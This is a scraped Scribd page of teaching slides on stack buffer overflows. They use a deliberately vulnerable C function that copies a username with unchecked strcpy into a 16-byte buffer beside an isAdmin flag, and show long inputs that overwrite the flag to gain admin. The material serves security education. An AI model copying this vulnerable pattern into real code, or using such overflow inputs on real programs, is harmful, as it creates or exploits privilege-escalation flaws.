Scribd
Upload
24K views23 pages

0x41 BufferOverflow

This document discusses stack buffer overflows. It explains the memory layout of functions, how C arrays work, and how buffer overflows can be exploited locally or remotely. It provides an example of a vulnerable function called handleData() that contains a buffer and integer variable. By passing a long string as input, an attacker can overwrite the integer's value and gain administrative privileges. The document also shows how buffer overflows work by overwriting memory addresses one by one until the return address is modified.

Uploaded by

Ahmed
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
24K views23 pages

0x41 BufferOverflow

This document discusses stack buffer overflows. It explains the memory layout of functions, how C arrays work, and how buffer overflows can be exploited locally or remotely. It provides an example of a vulnerable function called handleData() that contains a buffer and integer variable. By passing a long string as input, an attacker can overwrite the integer's value and gain administrative privileges. The document also shows how buffer overflows work by overwriting memory addresses one by one until the return address is modified.

Uploaded by

Ahmed
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 23

Stack Buffer Overflow

1
Content

Intel Architecture

Memory Layout Buffer Overflow

C Arrays
BoF Exploit

Assembler
Remote Exploit

Shellcode
Exploit Mitigations
Function Calls

Debugging Defeat Exploit Mitigations


2
Buffer Overflow
Without exploit

3
Buffalo Overflow

4
Buffer Overflow

▪ Challenge9
# ./challenge9 <username> <password>

# ./challenge9 someusername somepassword


You are not admin.
isAdmin: 0x0

5
Buffer Overflow

void handleData(char *username, char *password) {


int isAdmin = 0;
char firstname[16];

isAdmin = checkPassword(password);
strcpy(firstname, username);

if(isAdmin > 0) {
printf("Hello %s.\nYou are admin!\n”, name);
printf(“isAdmin: 0x%x\n", isAdmin);
} else {
printf("Hello %s.\nYou are not admin.\n”, name);
printf(“isAdmin: 0x%x\n", isAdmin);
}
}
6
Buffer Overflow

const char *adminHash = "$6$saaaaalty$cjw9qyA..";

int checkPassword(char *password) {


char *hash;

hash = crypt(password, "$6$saaaaalty");

if (strcmp(hash, adminHash) == 0) {
return 1;
} else {
return 0;
}
}
7
Buffer Overflow
&password
&username
SIP
SFP Stack Frame
<handleData>
isAdmin
firstname[16]

push pop

8
Buffer Overflow - Basic Layout

char firstname[16] isAdmin

strcpy(firstname, “AAAA AAAA AAAA AAAA”);

AAAA AAAA AAAA AAAA 0


Write up

9
Buffer Overflow - Basic Layout

char firstname[16] isAdmin

strcpy(firstname, “AAAA AAAA AAAA AAAA B”);

AAAA AAAA AAAA AAAA B

Write up

10
Buffer Overflow: handleData()

void handleData(char *username, char *password) {


int isAdmin = 0;
char firstname[16];
(0)
isAdmin = checkPassword(password);
(1)
strcpy(firstname, username);
(2)
if(isAdmin > 0) {
printf(“isAdmin: 0x%x\n", isAdmin);
} else {
printf(“isAdmin: 0x%x\n", isAdmin);
}
}

11
Buffer Overflow

char firstname[16] isAdmin

12
Buffer Overflow

char firstname[16] isAdmin

0 <undefined> <undef>

13
Buffer Overflow

char firstname[16] isAdmin

0 <undefined> <undef>

1 <undefined> 0x00000000

14
Buffer Overflow

char firstname[16] isAdmin

0 <undefined> <undef>

1 <undefined> 0x00000000

2 AAAAAAAAAAAAAAAAAAAAA 0x00000000

15
Buffer Overflow

char firstname[16] isAdmin

0 <undefined> <undef>

1 <undefined> 0x00000000

2 AAAAAAAAAAAAAAAAAAAAA 0x00000000

2 AAAAAAAAAAAAAAAAAAAAA 0x00000041
16
Buffer Overflow

2 AAAAAAAAAAAAAAA 0x00 0x00 0x00 0x00

17
Buffer Overflow

2 AAAAAAAAAAAAAAA 0x00 0x00 0x00 0x00

2 AAAAAAAAAAAAAAA A 0 0 0

18
Buffer Overflow

2 AAAAAAAAAAAAAAA 0x00 0x00 0x00 0x00

2 AAAAAAAAAAAAAAA A 0 0 0

2 AAAAAAAAAAAAAAA 0x41 0x00 0x00 0x00

19
Buffer Overflow

./challenge9 compass superpassword


You are not admin.

./challenge9 0123456789012345679012345678 test


You are not admin.

./challenge9 0123456789012345679012345678A test


You ARE admin!
isAdmin: 0x41

./challenge9 0123456789012345679012345678AB test


You ARE admin!
isAdmin: 0x4241

20
Buffer Overflow
Recap:
▪ Local variables of a function (buffers) are allocated adjectant to each other
▪ One after another, as written in the source code (first initialized first allocated)

21
Buffer Overflow

22
References
References:
▪ https://www.uperesia.com/buffer-overflow-explained
▪ https://www.youtube.com/watch?v=1S0aBV-Waeo Buffer Overflow Attack - Computerphile

23

You might also like